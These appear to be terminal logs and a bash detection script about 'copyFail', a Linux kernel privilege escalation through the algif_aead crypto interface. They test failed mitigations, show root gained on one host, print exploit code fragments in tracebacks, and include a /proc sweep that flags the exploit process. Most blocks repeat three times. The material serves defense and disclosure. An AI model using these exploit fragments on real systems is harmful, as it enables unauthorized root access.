$ echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead 2>/dev/null || true
chien-pang@pop-os:~/Downloads$ cat /etc/modprobe.d/disable-copyfail.conf
install algif_aead /bin/true
chien-pang@pop-os:~/Downloads$ lsmod | egrep -i "algif|aead"
algif_hash 16384 1
algif_skcipher 12288 1
af_alg 32768 6 algif_hash,algif_skcipher
chien-pang@pop-os:~/Downloads$ lsmod | grep algif_aead
chien-pang@pop-os:~/Downloads$ modprobe algif_aead ; echo $?
0
chien-pang@pop-os:~/Downloads$ lsmod | grep algif_aead
chien-pang@pop-os:~/Downloads$ ./copyFail30.py
Traceback (most recent call last): File "/home/chien-pang/Downloads/./copyFail30.py", line 36, in <module> while i<len(e):c(f,i,e[i:i+4]);i+=4 ^^^^^^^^^^^^^^^ File "/home/chien-pang/Downloads/./copyFail30.py", line 30, in c a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+\
'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),]\
,32768);r,w=g.pipe();splice(f, w, o, offset_src=0);splice(r, u.fileno(), o) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory
chien-pang@pop-os:~/Downloads$ id
uid=1000(chien-pang) gid=1000(chien-pang) groups=1000(chien-pang),4(adm),27(sudo),107(lpadmin)
chien-pang@pop-os:~/Downloads$ ls /root
ls: cannot open directory '/root': Permission denied
chien-pang@pop-os:~/Downloads$ cat /etc/modprobe.d/disable-copyfail.conf
install algif_aead /bin/true
chien-pang@pop-os:~/Downloads$ lsmod | egrep -i "algif|aead"
algif_hash 16384 1
algif_skcipher 12288 1
af_alg 32768 6 algif_hash,algif_skcipher
chien-pang@pop-os:~/Downloads$ lsmod | grep algif_aead
chien-pang@pop-os:~/Downloads$ modprobe algif_aead ; echo $?
0
chien-pang@pop-os:~/Downloads$ lsmod | grep algif_aead
chien-pang@pop-os:~/Downloads$ ./copyFail30.py
Traceback (most recent call last): File "/home/chien-pang/Downloads/./copyFail30.py", line 36, in <module> while i<len(e):c(f,i,e[i:i+4]);i+=4 ^^^^^^^^^^^^^^^ File "/home/chien-pang/Downloads/./copyFail30.py", line 30, in c a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+\
'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),]\
,32768);r,w=g.pipe();splice(f, w, o, offset_src=0);splice(r, u.fileno(), o) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory
chien-pang@pop-os:~/Downloads$ id
uid=1000(chien-pang) gid=1000(chien-pang) groups=1000(chien-pang),4(adm),27(sudo),107(lpadmin)
chien-pang@pop-os:~/Downloads$ ls /root
ls: cannot open directory '/root': Permission denied
chien-pang@pop-os:~/Downloads$ cat /etc/modprobe.d/disable-copyfail.conf
install algif_aead /bin/true
chien-pang@pop-os:~/Downloads$ lsmod | egrep -i "algif|aead"
algif_hash 16384 1
algif_skcipher 12288 1
af_alg 32768 6 algif_hash,algif_skcipher
chien-pang@pop-os:~/Downloads$ lsmod | grep algif_aead
chien-pang@pop-os:~/Downloads$ modprobe algif_aead ; echo $?
0
chien-pang@pop-os:~/Downloads$ lsmod | grep algif_aead
chien-pang@pop-os:~/Downloads$ ./copyFail30.py
Traceback (most recent call last): File "/home/chien-pang/Downloads/./copyFail30.py", line 36, in <module> while i<len(e):c(f,i,e[i:i+4]);i+=4 ^^^^^^^^^^^^^^^ File "/home/chien-pang/Downloads/./copyFail30.py", line 30, in c a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+\
'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),]\
,32768);r,w=g.pipe();splice(f, w, o, offset_src=0);splice(r, u.fileno(), o) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
FileNotFoundError: [Errno 2] No such file or directory
chien-pang@pop-os:~/Downloads$ id
uid=1000(chien-pang) gid=1000(chien-pang) groups=1000(chien-pang),4(adm),27(sudo),107(lpadmin)
chien-pang@pop-os:~/Downloads$ ls /root
ls: cannot open directory '/root': Permission denied
[cc2 ~]$ cat /proc/cmdline
BOOT_IMAGE=/Part2/bzImage root=UUID=571ee1af-1421-479d-845d-ea6b4f97292f ro net.ifnames=0 acpi=force intel_iommu=on amd_iommu=on iommu=pt console=ttyS0 console=tty0 initcall_blacklist=algif_aead_init
[cc2 ~]# su - nova
Last login: Tue May 12 12:15:09 CST 2026 on pts/2
[nova@cc2 ~]$ id
uid=116(nova) gid=124(nova) groups=124(nova),123(libvirt),64055(qemu)
[nova@cc2 ~]$ ls /root ; echo $?
ls: cannot open directory '/root': Permission denied
2
[nova@cc2 ~]$ lsmod | egrep -i "algif|aead"
[nova@cc2 ~]$ /tmp/copyFail30.py
[cc2 /var/lib/nova]# id
uid=0(root) gid=124(nova) groups=124(nova),123(libvirt),64055(qemu)
[cc2 /var/lib/nova]# ls /root ; echo $?
0
[cc2 ~]$ cat /proc/cmdline
BOOT_IMAGE=/Part2/bzImage root=UUID=571ee1af-1421-479d-845d-ea6b4f97292f ro net.ifnames=0 acpi=force intel_iommu=on amd_iommu=on iommu=pt console=ttyS0 console=tty0 initcall_blacklist=algif_aead_init
[cc2 ~]# su - nova
Last login: Tue May 12 12:15:09 CST 2026 on pts/2
[nova@cc2 ~]$ id
uid=116(nova) gid=124(nova) groups=124(nova),123(libvirt),64055(qemu)
[nova@cc2 ~]$ ls /root ; echo $?
ls: cannot open directory '/root': Permission denied
2
[nova@cc2 ~]$ lsmod | egrep -i "algif|aead"
[nova@cc2 ~]$ /tmp/copyFail30.py
[cc2 /var/lib/nova]# id
uid=0(root) gid=124(nova) groups=124(nova),123(libvirt),64055(qemu)
[cc2 /var/lib/nova]# ls /root ; echo $?
0
[cc2 ~]$ cat /proc/cmdline
BOOT_IMAGE=/Part2/bzImage root=UUID=571ee1af-1421-479d-845d-ea6b4f97292f ro net.ifnames=0 acpi=force intel_iommu=on amd_iommu=on iommu=pt console=ttyS0 console=tty0 initcall_blacklist=algif_aead_init
[cc2 ~]# su - nova
Last login: Tue May 12 12:15:09 CST 2026 on pts/2
[nova@cc2 ~]$ id
uid=116(nova) gid=124(nova) groups=124(nova),123(libvirt),64055(qemu)
[nova@cc2 ~]$ ls /root ; echo $?
ls: cannot open directory '/root': Permission denied
2
[nova@cc2 ~]$ lsmod | egrep -i "algif|aead"
[nova@cc2 ~]$ /tmp/copyFail30.py
[cc2 /var/lib/nova]# id
uid=0(root) gid=124(nova) groups=124(nova),123(libvirt),64055(qemu)
[cc2 /var/lib/nova]# ls /root ; echo $?
0
[cc2 /var/lib/nova]# grep af_alg /proc/kallsyms | tail
ffffffff98d52d20 r __ksymtab_af_alg_release_parent
ffffffff98d52d2c r __ksymtab_af_alg_sendmsg
ffffffff98d52d38 r __ksymtab_af_alg_unregister_type
ffffffff98d52d44 r __ksymtab_af_alg_wait_for_data
ffffffff98d52d50 r __ksymtab_af_alg_wmem_wakeup
ffffffff99f33ff0 t __pfx_af_alg_init
ffffffff99f34000 t af_alg_init
ffffffff9a185a10 d __initcall__kmod_af_alg__884_1325_af_alg_init6
ffffffff9a35b420 t __pfx_af_alg_exit
ffffffff9a35b430 t af_alg_exit
[cc2 /var/lib/nova]# grep af_alg /proc/kallsyms | tail
ffffffff98d52d20 r __ksymtab_af_alg_release_parent
ffffffff98d52d2c r __ksymtab_af_alg_sendmsg
ffffffff98d52d38 r __ksymtab_af_alg_unregister_type
ffffffff98d52d44 r __ksymtab_af_alg_wait_for_data
ffffffff98d52d50 r __ksymtab_af_alg_wmem_wakeup
ffffffff99f33ff0 t __pfx_af_alg_init
ffffffff99f34000 t af_alg_init
ffffffff9a185a10 d __initcall__kmod_af_alg__884_1325_af_alg_init6
ffffffff9a35b420 t __pfx_af_alg_exit
ffffffff9a35b430 t af_alg_exit
[cc2 /var/lib/nova]# grep af_alg /proc/kallsyms | tail
ffffffff98d52d20 r __ksymtab_af_alg_release_parent
ffffffff98d52d2c r __ksymtab_af_alg_sendmsg
ffffffff98d52d38 r __ksymtab_af_alg_unregister_type
ffffffff98d52d44 r __ksymtab_af_alg_wait_for_data
ffffffff98d52d50 r __ksymtab_af_alg_wmem_wakeup
ffffffff99f33ff0 t __pfx_af_alg_init
ffffffff99f34000 t af_alg_init
ffffffff9a185a10 d __initcall__kmod_af_alg__884_1325_af_alg_init6
ffffffff9a35b420 t __pfx_af_alg_exit
ffffffff9a35b430 t af_alg_exit
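#!/usr/bin/bash
# Sweep /proc for processes that hold the full effective capability set and
# whose lineage looks wrong: a root process spawned by a non-root parent, or a
# fully-capable process anywhere in a non-root lineage.  Each hit is printed as
# one table row followed by an alert line.
#
# Environment:
#   FULL_CAPEFF  hex CapEff value treated as "every capability".  Defaults to
#                000001ffffffffff (CAP_LAST_CAP = 40); kernels that add further
#                capabilities need a wider mask, so it is overridable.
#
# No `set -e` on purpose: processes disappear mid-scan and a failed read of a
# single /proc entry must not abort the whole sweep.

FULL_CAPEFF="${FULL_CAPEFF:-000001ffffffffff}"

#######################################
# Print one fixed-width table row.
# Arguments: $1..$7 - PID PPID UID EUID CapEff ParentUID CMD.  A missing or
#            empty argument is replaced by its column title, so a bare `Fmt`
#            prints the header row.
# Outputs:   one line on stdout
#######################################
Fmt() {
  printf "%-8s %-8s %-8s %-8s %-16s %-12s %s\n" \
    "${1:-PID}" "${2:-PPID}" "${3:-UID}" "${4:-EUID}" "${5:-CapEff}" "${6:-ParentUID}" "${7:-CMD}"
}

#######################################
# Print the separator line followed by the column titles.
# Outputs:   two lines on stdout
#######################################
FmtHeader() {
  echo "------------------------------------------------------------------------------------------"
  Fmt
}

#######################################
# Print the row for the process currently under examination.
# Globals:   pid ppid uid euid capeff parent_uid cmd (read)
# Outputs:   one line on stdout
#######################################
FmtContent() {
  Fmt "$pid" "$ppid" "$uid" "$euid" "$capeff" "$parent_uid" "$cmd"
}

#######################################
# Read a process's command line as one space-separated string, truncated to
# 80 characters.
# Arguments: $1 - pid
# Outputs:   the command line, or "?" when /proc/<pid>/cmdline is unreadable
#            (already exited, or not permitted)
#######################################
read_cmdline() {
  local path="/proc/$1/cmdline"
  local text
  if [[ -r "$path" ]] && text=$(tr '\0' ' ' < "$path" 2>/dev/null); then
    printf '%s\n' "${text:0:80}"
  else
    printf '?\n'
  fi
}

FmtHeader
for pid in /proc/[0-9]*; do
  pid=${pid#/proc/}
  status="/proc/$pid/status"
  [[ -r "$status" ]] || continue

  # One awk pass over status instead of four.  The "Uid:" line is
  # "real effective saved fs", so $2 is the real UID and $3 the effective UID.
  IFS=' ' read -r uid euid capeff ppid < <(
    awk '/^Uid:/ {u=$2; e=$3} /^CapEff:/ {c=$2} /^PPid:/ {p=$2} END {print u, e, c, p}' \
      "$status" 2>/dev/null
  )
  # The process may have exited between the -r test and the read.
  [[ -n "$capeff" && -n "$ppid" ]] || continue

  # Only fully-capable processes are interesting; bail out before paying for
  # the parent lookups and cmdline reads on everything else.
  [[ "$capeff" == "$FULL_CAPEFF" ]] || continue

  # Parent's real UID; "NA" when the parent is gone or unreadable, in which
  # case the lineage cannot be judged and the process is skipped.
  parent_uid="NA"
  if [[ -r "/proc/$ppid/status" ]]; then
    parent_uid=$(awk '/^Uid:/ {print $2}' "/proc/$ppid/status" 2>/dev/null)
  fi
  [[ "$parent_uid" != "NA" && -n "$parent_uid" ]] || continue

  cmd=$(read_cmdline "$pid")
  pcmd=$(read_cmdline "$ppid")

  if [[ "$uid" == "0" && "$parent_uid" != "0" ]]; then
    FmtContent
    printf '%s\n' "[!] ALERT: process ($pid[$(id -nu "$uid")]) spawned from non-root parent ($ppid[$(id -nu "$parent_uid")] $pcmd $(ps -o etime= -p "$ppid" 2>/dev/null | xargs))"
  elif [[ "$parent_uid" != "0" ]]; then
    FmtContent
    printf '%s\n' "[!] WARN: capabilities detected in non-root lineage (PID $pid[$(id -nu "$uid")])"
  elif [[ "$uid" != "$parent_uid" && "$uid" == "0" ]]; then
    # NOTE(review): this branch cannot fire as written — reaching it means
    # parent_uid == 0, which contradicts uid == 0 && uid != parent_uid.  Kept
    # for parity with the original; the intended check is presumably euid vs
    # uid (setuid escalation) — confirm before changing.
    FmtContent
    printf '%s\n' "[!] INFO: UID escalation detected (PID $pid[$(id -nu "$uid")])"
  fi
done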
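#!/usr/bin/bash
# Sweep /proc for processes that hold the full effective capability set and
# whose lineage looks wrong: a root process spawned by a non-root parent, or a
# fully-capable process anywhere in a non-root lineage.  Each hit is printed as
# one table row followed by an alert line.
#
# Environment:
#   FULL_CAPEFF  hex CapEff value treated as "every capability".  Defaults to
#                000001ffffffffff (CAP_LAST_CAP = 40); kernels that add further
#                capabilities need a wider mask, so it is overridable.
#
# No `set -e` on purpose: processes disappear mid-scan and a failed read of a
# single /proc entry must not abort the whole sweep.

FULL_CAPEFF="${FULL_CAPEFF:-000001ffffffffff}"

#######################################
# Print one fixed-width table row.
# Arguments: $1..$7 - PID PPID UID EUID CapEff ParentUID CMD.  A missing or
#            empty argument is replaced by its column title, so a bare `Fmt`
#            prints the header row.
# Outputs:   one line on stdout
#######################################
Fmt() {
  printf "%-8s %-8s %-8s %-8s %-16s %-12s %s\n" \
    "${1:-PID}" "${2:-PPID}" "${3:-UID}" "${4:-EUID}" "${5:-CapEff}" "${6:-ParentUID}" "${7:-CMD}"
}

#######################################
# Print the separator line followed by the column titles.
# Outputs:   two lines on stdout
#######################################
FmtHeader() {
  echo "------------------------------------------------------------------------------------------"
  Fmt
}

#######################################
# Print the row for the process currently under examination.
# Globals:   pid ppid uid euid capeff parent_uid cmd (read)
# Outputs:   one line on stdout
#######################################
FmtContent() {
  Fmt "$pid" "$ppid" "$uid" "$euid" "$capeff" "$parent_uid" "$cmd"
}

#######################################
# Read a process's command line as one space-separated string, truncated to
# 80 characters.
# Arguments: $1 - pid
# Outputs:   the command line, or "?" when /proc/<pid>/cmdline is unreadable
#            (already exited, or not permitted)
#######################################
read_cmdline() {
  local path="/proc/$1/cmdline"
  local text
  if [[ -r "$path" ]] && text=$(tr '\0' ' ' < "$path" 2>/dev/null); then
    printf '%s\n' "${text:0:80}"
  else
    printf '?\n'
  fi
}

FmtHeader
for pid in /proc/[0-9]*; do
  pid=${pid#/proc/}
  status="/proc/$pid/status"
  [[ -r "$status" ]] || continue

  # One awk pass over status instead of four.  The "Uid:" line is
  # "real effective saved fs", so $2 is the real UID and $3 the effective UID.
  IFS=' ' read -r uid euid capeff ppid < <(
    awk '/^Uid:/ {u=$2; e=$3} /^CapEff:/ {c=$2} /^PPid:/ {p=$2} END {print u, e, c, p}' \
      "$status" 2>/dev/null
  )
  # The process may have exited between the -r test and the read.
  [[ -n "$capeff" && -n "$ppid" ]] || continue

  # Only fully-capable processes are interesting; bail out before paying for
  # the parent lookups and cmdline reads on everything else.
  [[ "$capeff" == "$FULL_CAPEFF" ]] || continue

  # Parent's real UID; "NA" when the parent is gone or unreadable, in which
  # case the lineage cannot be judged and the process is skipped.
  parent_uid="NA"
  if [[ -r "/proc/$ppid/status" ]]; then
    parent_uid=$(awk '/^Uid:/ {print $2}' "/proc/$ppid/status" 2>/dev/null)
  fi
  [[ "$parent_uid" != "NA" && -n "$parent_uid" ]] || continue

  cmd=$(read_cmdline "$pid")
  pcmd=$(read_cmdline "$ppid")

  if [[ "$uid" == "0" && "$parent_uid" != "0" ]]; then
    FmtContent
    printf '%s\n' "[!] ALERT: process ($pid[$(id -nu "$uid")]) spawned from non-root parent ($ppid[$(id -nu "$parent_uid")] $pcmd $(ps -o etime= -p "$ppid" 2>/dev/null | xargs))"
  elif [[ "$parent_uid" != "0" ]]; then
    FmtContent
    printf '%s\n' "[!] WARN: capabilities detected in non-root lineage (PID $pid[$(id -nu "$uid")])"
  elif [[ "$uid" != "$parent_uid" && "$uid" == "0" ]]; then
    # NOTE(review): this branch cannot fire as written — reaching it means
    # parent_uid == 0, which contradicts uid == 0 && uid != parent_uid.  Kept
    # for parity with the original; the intended check is presumably euid vs
    # uid (setuid escalation) — confirm before changing.
    FmtContent
    printf '%s\n' "[!] INFO: UID escalation detected (PID $pid[$(id -nu "$uid")])"
  fi
done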
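#!/usr/bin/bash
# Sweep /proc for processes that hold the full effective capability set and
# whose lineage looks wrong: a root process spawned by a non-root parent, or a
# fully-capable process anywhere in a non-root lineage.  Each hit is printed as
# one table row followed by an alert line.
#
# Environment:
#   FULL_CAPEFF  hex CapEff value treated as "every capability".  Defaults to
#                000001ffffffffff (CAP_LAST_CAP = 40); kernels that add further
#                capabilities need a wider mask, so it is overridable.
#
# No `set -e` on purpose: processes disappear mid-scan and a failed read of a
# single /proc entry must not abort the whole sweep.

FULL_CAPEFF="${FULL_CAPEFF:-000001ffffffffff}"

#######################################
# Print one fixed-width table row.
# Arguments: $1..$7 - PID PPID UID EUID CapEff ParentUID CMD.  A missing or
#            empty argument is replaced by its column title, so a bare `Fmt`
#            prints the header row.
# Outputs:   one line on stdout
#######################################
Fmt() {
  printf "%-8s %-8s %-8s %-8s %-16s %-12s %s\n" \
    "${1:-PID}" "${2:-PPID}" "${3:-UID}" "${4:-EUID}" "${5:-CapEff}" "${6:-ParentUID}" "${7:-CMD}"
}

#######################################
# Print the separator line followed by the column titles.
# Outputs:   two lines on stdout
#######################################
FmtHeader() {
  echo "------------------------------------------------------------------------------------------"
  Fmt
}

#######################################
# Print the row for the process currently under examination.
# Globals:   pid ppid uid euid capeff parent_uid cmd (read)
# Outputs:   one line on stdout
#######################################
FmtContent() {
  Fmt "$pid" "$ppid" "$uid" "$euid" "$capeff" "$parent_uid" "$cmd"
}

#######################################
# Read a process's command line as one space-separated string, truncated to
# 80 characters.
# Arguments: $1 - pid
# Outputs:   the command line, or "?" when /proc/<pid>/cmdline is unreadable
#            (already exited, or not permitted)
#######################################
read_cmdline() {
  local path="/proc/$1/cmdline"
  local text
  if [[ -r "$path" ]] && text=$(tr '\0' ' ' < "$path" 2>/dev/null); then
    printf '%s\n' "${text:0:80}"
  else
    printf '?\n'
  fi
}

FmtHeader
for pid in /proc/[0-9]*; do
  pid=${pid#/proc/}
  status="/proc/$pid/status"
  [[ -r "$status" ]] || continue

  # One awk pass over status instead of four.  The "Uid:" line is
  # "real effective saved fs", so $2 is the real UID and $3 the effective UID.
  IFS=' ' read -r uid euid capeff ppid < <(
    awk '/^Uid:/ {u=$2; e=$3} /^CapEff:/ {c=$2} /^PPid:/ {p=$2} END {print u, e, c, p}' \
      "$status" 2>/dev/null
  )
  # The process may have exited between the -r test and the read.
  [[ -n "$capeff" && -n "$ppid" ]] || continue

  # Only fully-capable processes are interesting; bail out before paying for
  # the parent lookups and cmdline reads on everything else.
  [[ "$capeff" == "$FULL_CAPEFF" ]] || continue

  # Parent's real UID; "NA" when the parent is gone or unreadable, in which
  # case the lineage cannot be judged and the process is skipped.
  parent_uid="NA"
  if [[ -r "/proc/$ppid/status" ]]; then
    parent_uid=$(awk '/^Uid:/ {print $2}' "/proc/$ppid/status" 2>/dev/null)
  fi
  [[ "$parent_uid" != "NA" && -n "$parent_uid" ]] || continue

  cmd=$(read_cmdline "$pid")
  pcmd=$(read_cmdline "$ppid")

  if [[ "$uid" == "0" && "$parent_uid" != "0" ]]; then
    FmtContent
    printf '%s\n' "[!] ALERT: process ($pid[$(id -nu "$uid")]) spawned from non-root parent ($ppid[$(id -nu "$parent_uid")] $pcmd $(ps -o etime= -p "$ppid" 2>/dev/null | xargs))"
  elif [[ "$parent_uid" != "0" ]]; then
    FmtContent
    printf '%s\n' "[!] WARN: capabilities detected in non-root lineage (PID $pid[$(id -nu "$uid")])"
  elif [[ "$uid" != "$parent_uid" && "$uid" == "0" ]]; then
    # NOTE(review): this branch cannot fire as written — reaching it means
    # parent_uid == 0, which contradicts uid == 0 && uid != parent_uid.  Kept
    # for parity with the original; the intended check is presumably euid vs
    # uid (setuid escalation) — confirm before changing.
    FmtContent
    printf '%s\n' "[!] INFO: UID escalation detected (PID $pid[$(id -nu "$uid")])"
  fi
done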
[cc2 ~]# bash /tmp/copying-fail-detect.sh
------------------------------------------------------------------------------------------
PID PPID UID EUID CapEff ParentUID CMD
2988938 2988937 0 0 000001ffffffffff 116
[!] ALERT: process (2988938[root]) spawned from non-root parent (2988937[nova] python3 /tmp/copyFail30.py 36:16)
...(truncated)...
[cc2 ~]# bash /tmp/copying-fail-detect.sh
------------------------------------------------------------------------------------------
PID PPID UID EUID CapEff ParentUID CMD
2988938 2988937 0 0 000001ffffffffff 116
[!] ALERT: process (2988938[root]) spawned from non-root parent (2988937[nova] python3 /tmp/copyFail30.py 36:16)
...(truncated)...
[cc2 ~]# bash /tmp/copying-fail-detect.sh
------------------------------------------------------------------------------------------
PID PPID UID EUID CapEff ParentUID CMD
2988938 2988937 0 0 000001ffffffffff 116
[!] ALERT: process (2988938[root]) spawned from non-root parent (2988937[nova] python3 /tmp/copyFail30.py 36:16)
...(truncated)...
- Remediation takes a long time
- Rolling out a new kernel is a painful operation
- Mitigation recommendations may not work (in the cc2 session above, `initcall_blacklist=algif_aead_init` was present on the kernel command line and the script still obtained uid=0)
- Mitigation recommendations could break features